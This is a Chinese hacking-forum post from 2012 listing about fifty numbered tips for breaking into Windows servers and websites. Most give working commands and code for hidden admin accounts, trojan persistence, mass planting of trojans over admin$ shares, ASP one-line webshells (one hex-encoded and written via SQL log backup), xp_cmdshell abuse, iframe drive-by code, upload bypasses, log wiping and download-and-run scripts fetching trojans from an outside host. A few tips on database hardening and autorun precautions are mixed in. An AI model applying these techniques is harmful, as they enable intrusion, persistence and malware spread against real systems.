找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2705|回复: 0
打印 上一主题 下一主题

一些笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:51:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
2 G9 H3 J' D; H% Q) pcacls C:\windows\system32 /G hqw20:R' p2 a6 b2 u& R( B- p
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入5 \# z) S3 ?0 E
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
/ [& U! E  l& l7 g; w: T  w7 {" t1 D+ v# ?7 S
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。9 G3 e/ U- c$ m! Z# l
: g/ Y) x. b/ _! G# [: e+ L( Q0 H
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。2 [$ b# G4 O! U
! M3 b' O& r; h- l
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
8 I' l! }& v+ K, ]; e6 l" E" r; g. ^1 _# Z$ |$ ?
5、利用INF文件来修改注册表1 I' k, c9 c1 w, P+ m
[Version]
, O- l$ R* e  f; a) gSignature="$CHICAGO$"
8 S, y5 O, n2 S+ ^$ a3 B2 n[Defaultinstall]% A0 h4 s4 h% m  g, ]2 |
addREG=Ating- z+ Y1 f% j9 U' z# m
[Ating]
) K- [8 E1 ]% y( c' P" }7 ~1 qHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
* P4 @8 b- h( g# q) U8 A. X以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
' a+ o  ~9 \9 n1 Lrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径' O2 J1 U  \0 f  h  |
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU7 l2 A( ]3 s2 f. W% W3 ~
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU! S- j# u; D2 Y6 d& h0 X
HKEY_CURRENT_CONFIG 简写为 HKCC/ t0 N2 `2 e3 e2 O9 |
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
0 H0 r/ Z3 p# v"1"这里代表是写入或删除注册表键值中的具体数据
. j+ S/ c' M$ G  e: V% U# A
5 p) R1 }- n' t9 I2 X  o" T6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,% Q6 _) h; j+ _0 E$ I% v4 w
多了一步就是在防火墙里添加个端口,然后导出其键值8 a) a3 j2 [( s+ d
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]) n0 S" F2 l: t4 P3 b3 w

5 ?" [$ f( H8 ]1 }7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
; h$ ]2 e' j+ }+ ]/ G; j) n在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
& p) `4 ^8 N, _% i; M1 P
; _& ~4 d& ]: B0 V; M4 w1 F% t8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。7 N$ P" {* ?% w* e5 q5 M% e% p

9 m8 g$ {8 N2 u' s9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
6 T' d& ]! f0 @: C+ o可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。( ^9 H9 q+ j5 N# n
' g' u$ Z0 i" l9 e. @) R/ a3 z
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”3 O3 f5 \6 I' R7 h

% X5 o& `0 U& J5 Q11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,. f. B5 \6 O6 F! c, b9 ~' H$ c
用法:xsniff –pass –hide –log pass.txt
. a3 s2 v( y& J& q* l) s  f& w
- P& b# d& T& }  E) E% h8 Q9 C" d12、google搜索的艺术% s) G& f( `! ~& q, l& L# P% N
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”7 l* x7 U4 F, g- s9 w
或“字符串的语法错误”可以找到很多sql注入漏洞。
/ i6 D9 U6 H1 y$ ~( m
$ t: v% W/ H) u/ I" y13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
8 a3 m( Q1 k3 h3 M3 [4 X! l0 h$ q- l- A: n
14、cmd中输入 nc –vv –l –p 1987; r' G3 a# Q; X. C
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃; w4 W5 s/ K3 D
5 E6 s; V7 _1 Z( O$ I; M4 r
15、制作T++木马,先写个ating.hta文件,内容为
3 F8 L! k. H7 U6 K! l<script language="VBScript">4 h& Z7 _8 `! }: e) h$ B
set wshshell=createobject ("wscript.shell" )
1 ^+ Y9 ^' T" p* \a=wshshell.run("你马的名称",1)1 P5 j" i4 Y4 L
window.close  S( R+ f& m: S# n2 b, b
</script>
3 M4 i5 [* H1 w/ E1 q& K再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
4 K+ Y3 z* I/ g. e/ x5 X) h+ T" M" q% w3 x; w; w
16、搜索栏里输入  M8 s( g4 {9 m3 F) v
关键字%'and 1=1 and '%'=', c! h# ^2 N9 ?3 q
关键字%'and 1=2 and '%'='
6 A9 {# f. d/ X! U比较不同处 可以作为注入的特征字符5 l6 R* b% q8 n
% Q3 C/ h' V0 S7 A8 c' F
17、挂马代码<html>* }9 W6 X5 d! u2 H2 U3 o) ?+ N
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>$ N- n! ?; J& ]
</html>
7 I; |! E. {" }4 N  M0 L: G' d5 A1 p
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
6 B6 q% M$ w( Fnet localgroup administrators还是可以看出Guest是管理员来。7 b1 i1 K5 Q2 e' ^0 l* @
& n. O9 P1 `* t' \2 Y' A9 m
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
: l9 X  G% a3 P2 ^) i/ |) Q用法: 安装: instsrv.exe 服务名称 路径& Z/ e! a: e" e$ L% I
卸载: instsrv.exe 服务名称 REMOVE7 R& ~# m) w: F' o, @
& R" i: K% H, }8 I$ e  N

7 V' R" K+ F$ a5 S1 \8 h21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉/ z2 l7 w$ ^( m$ a, J9 E( H
不能注入时要第一时间想到%5c暴库。
/ m4 [# C8 r# r. W2 [0 T7 [; i  h% L$ }7 k" l! J+ X3 I
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~. K. z1 _: g4 g3 v# y
) T1 l- R3 J6 x/ |+ s
23、缺少xp_cmdshell时
$ A, F* a, i! f7 v# ^7 W1 v尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
, F+ a; o, o7 r$ |8 B2 T* u假如恢复不成功,可以尝试直接加用户(针对开3389的)
' x; T, v+ C7 |* ~2 ]declare @o int  Y7 l  p* z+ I
exec sp_oacreate 'wscript.shell',@o out
/ k) L/ ~7 M6 ]$ Iexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
+ M: ?8 R0 t; S9 Z/ W/ K; K8 n/ S) s+ r
24.批量种植木马.bat4 [, l" [& |" J6 \+ [3 h$ H$ e
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
( S) w5 p' c0 M1 Z7 a; Hfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
% C% L. h9 K$ o% I( b+ W* _# N扫描地址.txt里每个主机名一行 用\\开头
: L8 }( A5 t  W$ p- L' x8 Q" s8 ?0 C. k
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
, X& N% G! z& w, z8 ?
1 X+ K9 R/ l* Q5 a$ n% L2 k9 |0 I26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
; P: X* z# V5 v# m! t. k将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.% M5 Y+ ~( ^2 G9 B" y$ _8 R
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马. d* r5 `* N+ V1 c3 M0 ~

& s* h$ P/ h6 ]  Z* D: B& X27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP$ n0 k4 O' t; Y6 u; H
然后用#clear logg和#clear line vty *删除日志
% m) t# h$ H: v  w5 n
, T/ u5 a6 E1 a% S( k! W$ d9 O8 ]28、电脑坏了省去重新安装系统的方法# h( W  k( I- W( M2 v9 a
纯dos下执行,4 }. I  O8 E! G% t2 D3 j
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config, t% L$ U. h  m; @8 A. v
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
+ j' A2 Y7 f/ }& c  {' B. l- _! P! F( e
29、解决TCP/IP筛选 在注册表里有三处,分别是:
. V( v5 q4 O6 X5 P0 W. H+ Z0 B4 uHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip; m2 Q3 X+ v) d; b9 k, s
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip7 h* w2 w# X: Y. O; R% Y" e
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip. C  p  c8 n4 F+ t7 u* T' J
分别用) C5 `9 q+ c$ ?- `3 V+ z
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip% ?' n$ t9 g  z/ E- W* T
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip. Y+ q6 e1 X0 G8 }% h0 r( Z) [5 A% n; N3 N
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip% \) X3 Q; W8 j+ e
命令来导出注册表项
# d! _2 _% d. }+ K  A然后把三个文件里的EnableSecurityFilters"=dword:00000001," x2 `0 ]7 N0 a, |2 }* A* W" Q' h
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用% {5 W5 K. ^9 m) M% l9 {+ R7 ^
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
) Q. I8 s. N8 w& `) F6 |
/ S! l& G- S; t30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U) k" D1 V1 w8 h  a" d$ L. S
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
5 f: C1 [6 E6 d- @  c
' \  G, N1 s8 C6 m1 g  {31、全手工打造开3389工具
9 k) i0 s0 Z3 |. P6 e打开记事本,编辑内容如下:8 Y& a# ~! h7 T8 ~& M
echo [Components] > c:\sql
- @" E0 Z) h* _% \, \* Zecho TSEnable = on >> c:\sql
6 E; |' v  W% ?( l# csysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
0 G2 @5 h) a: M" ~9 o编辑好后存为BAT文件,上传至肉鸡,执行
# V( k: Q; Z7 R: O6 b/ I
1 Q! g* X& ~' t, o. c32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马+ ?7 o8 F# d' K) ^
+ Q/ _7 G  T# P4 B6 b. E! c2 b
33、让服务器重启, G1 C4 _6 U- B$ r
写个bat死循环:  {* Z3 C7 F* a& w1 a) {
@echo off
: g7 ^8 q3 c; s+ O:loop1
7 i9 M8 v( b7 P7 t2 B  x1 scls8 m3 g6 l, J" [9 ^
start cmd.exe
) A- e! j: X3 hgoto loop1
2 ]' k% t( H- j- C. i3 E保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
9 B$ m: I$ H/ l+ U- d; t3 x& ]3 \2 R1 L& L+ _, B/ I: l
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
9 w3 b, r2 }( {# e/ ]0 Z@echo off0 k( N7 U, f& y' J
date /t >c:/3389.txt
2 f% {9 z- h6 y, Ttime /t >>c:/3389.txt4 a/ ~" N8 g" @: k& V( t0 C4 y
attrib +s +h c:/3389.bat
3 [: W! z2 H4 S5 Z$ z& N, Dattrib +s +h c:/3389.txt
/ d% |- |8 p& A- ^) f' Cnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt9 }5 J1 F1 z# D6 j  n8 }$ W3 P
并保存为3389.bat2 k0 q1 p% c; d& E9 I) [
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
. q9 e! ?6 e0 g$ q' A7 T! e( `: d, P  E" x4 q$ G3 J4 Z6 T
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
9 M' M: O! w) |; e3 M$ W( Jstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)' d6 K0 r: s) V! V
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。/ M! J( w% n  D2 v0 v

4 l8 |# Z) t8 V) R' p+ L* l6 w; O4 W36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
3 `0 i5 z  W5 recho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址1 O& M+ \& Z" w. k+ O
echo 你的FTP账号 >>c:\1.bat //输入账号
0 c& ^/ u; m7 Y' d$ e* d- z9 Wecho 你的FTP密码 >>c:\1.bat //输入密码
/ x% {) r# u9 Uecho bin >>c:\1.bat //登入1 C: H( b- h7 Q3 y7 R
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
" r- W" C  ^; g3 n! Y, decho bye >>c:\1.bat //退出( Y' T) a, X- d7 K5 ~+ j+ V5 j
然后执行ftp -s:c:\1.bat即可( i+ w' J) V5 n+ X* a5 O5 }- z* `5 z5 i
# v, i. P, }1 r
37、修改注册表开3389两法& Z% w. Z& t# A
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
. B9 m: P, W0 v  Eecho Windows Registry Editor Version 5.00 >>3389.reg6 t3 _6 m0 j& m/ B( y
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg7 g; n% p! H- {1 ~. o' [) ~5 R9 S
echo "Enabled"="0" >>3389.reg1 X$ o' |) m, l8 Z5 c7 t6 Y) [& j
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
  U6 B% t; m* D6 ~% s# `8 \2 \NT\CurrentVersion\Winlogon] >>3389.reg7 Z+ G* ?- ^! t4 B& v
echo "ShutdownWithoutLogon"="0" >>3389.reg# E* s- k2 d0 m) L% N
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]. E) s/ x# A  \# e6 O! Q4 s8 w
>>3389.reg
) |% j' f4 E1 M7 j  i4 h3 Hecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg; s, \$ s( I1 Z+ ~" Y! d! d' J3 V, U
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]- G) Z& V' J) q3 s8 w
>>3389.reg
, p9 ]/ v3 e3 [echo "TSEnabled"=dword:00000001 >>3389.reg  H1 J9 s$ p; E# h
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
, n' p5 l$ l# H6 i$ Aecho "Start"=dword:00000002 >>3389.reg
7 W/ G7 d* b' p1 qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
2 ?! O7 Y' M. S0 T>>3389.reg
/ x; u5 W0 y/ |+ j5 Eecho "Start"=dword:00000002 >>3389.reg3 y0 x3 q! _/ |9 Y' g" W! }4 z' o
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg" w# ]) W4 ^; Z: Z! e" t
echo "Hotkey"="1" >>3389.reg
* i  v- j% k: M' G6 u5 i8 G5 \5 hecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal8 W) @& Y1 G$ ~) Y
Server\Wds\rdpwd\Tds\tcp] >>3389.reg4 \+ }0 D% y; ^4 S! O. i0 {
echo "PortNumber"=dword:00000D3D >>3389.reg
, a, _: r' z( O2 n; U1 necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal" O' n8 J% d0 f, h3 p
Server\WinStations\RDP-Tcp] >>3389.reg
7 `3 y$ c4 K0 @" H3 C, A- a. Aecho "PortNumber"=dword:00000D3D >>3389.reg
& b5 c6 Z/ O! A7 S' u- k把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。( P2 Y  `" H9 p  z9 S& F/ n
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了): s! L, ]) k  I/ {
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
" t( I: h2 C, j: J7 J% Q(2)winxp和win2003终端开启
* Q( M' `& f, U用以下ECHO代码写一个REG文件:
8 p! c* t1 g5 G" aecho Windows Registry Editor Version 5.00>>3389.reg4 `/ w9 d. w6 X/ B$ q  ]
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
" o" C$ y0 V$ N2 f" l' bServer]>>3389.reg
9 W' s& `6 x8 y( X9 Y* r! gecho "fDenyTSConnections"=dword:00000000>>3389.reg
7 @; T1 _3 y5 w1 Pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
  B0 B2 b4 `1 P. X7 B: CServer\Wds\rdpwd\Tds\tcp]>>3389.reg
- F' N5 q) W- w  d9 h, l' becho "PortNumber"=dword:00000d3d>>3389.reg
* m9 O2 ]: n9 d, P$ ]9 A/ Wecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
4 n  T( Y0 t0 t$ EServer\WinStations\RDP-Tcp]>>3389.reg! N9 }8 B$ E& J; R* a0 X- G' }1 c
echo "PortNumber"=dword:00000d3d>>3389.reg
0 \- Z/ V2 X5 v! A然后regedit /s 3389.reg del 3389.reg4 S8 @' C$ m0 x7 J
XP下不论开终端还是改终端端口都不需重启" \7 Q9 c' i+ Q. W! H# K: o" H7 L
- F; e* `3 I' t* X) R6 H
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
. ]9 j: S3 Z* l% a+ l9 ^' D  S0 a/ a' G用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
6 G" n+ g0 C- V3 i0 \! j
5 U& _6 U- {+ c4 w& Z39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
2 X$ t) V, i4 t5 K0 r6 e3 ?(1)数据库文件名应复杂并要有特殊字符
+ X, G- g: A$ I/ T6 ~% b( O(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
- D" Z' n' {# v7 l  n( f将conn.asp文档中的) ]+ S8 D$ ~) |
DBPath = Server.MapPath("数据库.mdb")
6 W+ h8 s3 a$ tconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath8 A5 a" I) W% e7 W

2 a& f6 w$ M3 D8 Z7 l修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置. p2 U' m! u# k! y3 [8 k  X. e
(3)不放在WEB目录里  {2 ]- ?' q( z# n' W
/ m! O# |) i/ m, D
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉- r" k$ y- \8 ~- Y( r& X6 X5 @
可以写两个bat文件( `, _3 M1 w% d) O. o" o
@echo off
, }' D* r6 a' y+ Y5 `6 G; Z; B@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe9 Y5 N: d3 D2 D! i: v2 E" q
@del c:\winnt\system32\query.exe9 y0 K1 q7 A6 s* b. R" y* T+ `
@del %SYSTEMROOT%\system32\dllcache\query.exe
' J/ \5 N8 _9 s; L4 u" C@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的5 F7 w6 l, j3 W: v; c( H6 i
0 P$ E" y" Q  O
@echo off+ C/ v; Q1 N% z, j: N6 Y
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe) T( l: C3 r# l7 E% v5 v
@del c:\winnt\system32\tsadmin.exe
/ z9 n3 q' c& V@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
3 A& D+ Y4 M( G  u! V( s, I2 [$ D7 D# _3 s/ r: ~% T
41、映射对方盘符+ `$ o; b- z! l+ F( Y6 z2 ~
telnet到他的机器上,
+ m( {( @! A  K# y& s: F- C8 Fnet share 查看有没有默认共享 如果没有,那么就接着运行! s& A& s" J  L4 d! Q) e
net share c$=c:
  s! r( V$ ^( I; ]( ?net share现在有c$! J0 _! U: n/ D5 f( v/ s: J7 ~/ ^
在自己的机器上运行" m! v( r3 Q) D/ e1 ?
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
- P! h( o% e6 Y( M; Y; o' Y8 e* c
42、一些很有用的老知识1 T$ Q& U, v5 K8 K% Q# }
type c:\boot.ini ( 查看系统版本 )+ u( J8 T( T; ^" j2 Z. O
net start (查看已经启动的服务)
7 x% B' |6 Q9 z8 R5 cquery user ( 查看当前终端连接 )
! B, K7 h4 M* p2 \6 X2 `net user ( 查看当前用户 )
# T3 e  D- i( D$ E! _7 X. d) H9 }net user 用户 密码/add ( 建立账号 )
6 s: S" h" C1 Qnet localgroup administrators 用户 /add (提升某用户为管理员)- _2 [0 r9 |- `) H9 n9 p# T
ipconfig -all ( 查看IP什么的 )
6 ?9 u! C. u8 k' h' Pnetstat -an ( 查看当前网络状态 )' O$ ~$ f1 Q. y
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
4 K4 m6 ?8 _- J6 \( y1 V, w$ y克隆时Administrator对应1F4
3 \/ A! g$ e! W) oguest对应1F5% W* V6 ]4 e2 A; w% j$ w
tsinternetuser对应3E8# q: a) c8 Z& q. f6 z

- {7 w# E) ]8 {# p& F# M' j43、如果对方没开3389,但是装了Remote Administrator Service, ^! w# h( X& Y4 u3 D
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接: T  K* |* ]" H' J0 r0 ]
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
* |% p+ u: |8 [! x3 G' y# v0 t# c先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
3 O8 o2 w/ i& [+ M0 `; X  [# ^. t# z% q2 w2 x3 h) G) M1 C# @) Z, m
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
, t1 D" C1 e- q2 v. j* n, v# T' [. j6 N本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)% v, _( j2 t8 [5 j# b

0 @1 d; z, \% C4 J: }2 Y9 Y; r45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
5 C9 l) v  w. Q: Uecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open2 R+ O. M+ ~' @+ V$ a
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
8 J. l/ }0 m4 X7 p  T9 mCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =% Y3 l) b$ Y. H' d; v! V2 V! J. Y
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs/ L. ]5 m; p7 F6 J/ W# g2 I/ @+ \6 J
(这是完整的一句话,其中没有换行符)
6 S  J4 o3 \: ~/ O然后下载:
# o/ M9 v! R9 ?" ]) ?/ b# e9 Ecscript down.vbs http://www.hack520.org/hack.exe hack.exe
  E9 h8 s. w4 G1 c, q  q8 s. q8 K- R3 @, i0 W8 M! _3 r
46、一句话木马成功依赖于两个条件:( S) g- ~0 A% K( J0 q, J" _
1、服务端没有禁止adodb.Stream或FSO组件7 g7 {9 o0 Q2 X
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。6 R! n& h5 `" C7 B$ G* F* h. s- z6 G( R
7 V) Z& S( o. p! v
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
( n; q2 ^! G& f9 m7 J;alter database utsz set RECOVERY FULL--
& B  Z  Q( l! A$ f- ~1 E* q1 N5 X1 e5 j1 F;create table cmd (a image)--
" ~9 T1 [" m8 w! ?* I6 M* w  Y;backup log utsz to disk = 'D:\cmd' with init--4 @3 y! t& X  f
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--! E9 }" Y; H8 X
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
, U/ d/ P& a* d5 f2 W5 u! w2 Y; w  Z注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
' l: R( k5 T6 s9 v: b! B
% u+ k# x  q1 Z3 c$ V48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:3 ~( M4 t0 a1 w

& u) k! b) J+ x0 J% y. e用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
3 R/ V( r; F9 J% o+ a- a所有会话用 'all'。
& F3 R; c( }9 V& o. M- T-s sessionid 列出会话的信息。
/ H4 E) M( ~% a* o-k sessionid 终止会话。! H9 B  H1 I  Y
-m sessionid 发送消息到会话。# `! ?0 [: U; B
# I  b! `' M5 w5 L! J$ [" g
config 配置 telnet 服务器参数。
+ X$ W* K; D5 K* T
7 d& E! n" O2 ]) hcommon_options 为:
7 _4 X  s- V) E-u user 指定要使用其凭据的用户/ W/ ?% ~$ I6 x' ^
-p password 用户密码
: M- C3 @0 c; K8 H
8 S) e) K4 @. gconfig_options 为:+ b9 d. U4 C3 `# u& A6 f! u
dom = domain 设定用户的默认域
) a5 e3 N& c) hctrlakeymap = yes|no 设定 ALT 键的映射
2 j4 d/ J+ m) H: ?( Stimeout = hh:mm:ss 设定空闲会话超时值
  A& P  C9 P: `4 m& ^2 qtimeoutactive = yes|no 启用空闲会话。6 C/ {' j) y9 s2 `
maxfail = attempts 设定断开前失败的登录企图数。
- G/ j+ J" c0 Hmaxconn = connections 设定最大连接数。
: f7 F) l! V6 V$ b2 D! M; n5 Wport = number 设定 telnet 端口。
% K; S' P) L- U: ~# K9 e  X; T: Isec = [+/-]NTLM [+/-]passwd2 W0 y/ n$ \9 z2 A; K1 n& c$ f
设定身份验证机构# ]5 B/ s! `) }
fname = file 指定审计文件名。1 s( w' y5 p; f: ]
fsize = size 指定审计文件的最大尺寸(MB)。
- T" u" ^4 S6 c" J+ u# j2 A% Tmode = console|stream 指定操作模式。( x! Y! u0 A- {5 m6 L2 y
auditlocation = eventlog|file|both
6 K. v! t2 U# h& y: d+ l) W* n6 q指定记录地点
; O; W/ X5 }# q: gaudit = [+/-]user [+/-]fail [+/-]admin: P( A/ e: T# h. o4 H9 ?+ ~

- t+ Y! p+ {2 I5 n6 T# M! I49、例如:在IE上访问:
; o3 e% V# J+ o) ]/ h2 U9 J+ {8 _www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
% [3 ~# ]$ Z- H$ Yhack.txt里面的代码是:
  y- M4 E8 [# Y: b2 B. h<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
4 h% W4 h: p* U; c( O7 c把这个hack.txt发到你空间就可以了!. G6 e2 W" Z0 g  V
这个可以利用来做网马哦!
2 Q" G* g  ?$ J* ~5 P5 V0 W8 v: v; D1 I
50、autorun的病毒可以通过手动限制!0 p' r# ]4 H# y/ u) ]( W
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!* @, M+ d5 E, ~) d9 ?
2,打开盘符用右键打开!切忌双击盘符~6 W0 m! g5 D  C/ P/ v1 G* [" D
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
) x! V7 z6 d5 {) a7 N8 A$ W( e/ J+ R
51、log备份时的一句话木马:
) s& G1 c* k% ka).<%%25Execute(request("go"))%%25>
& u6 v; _! x- {- s7 Zb).<%Execute(request("go"))%>
5 b! e2 ?& @% z- P$ Rc).%><%execute request("go")%><%
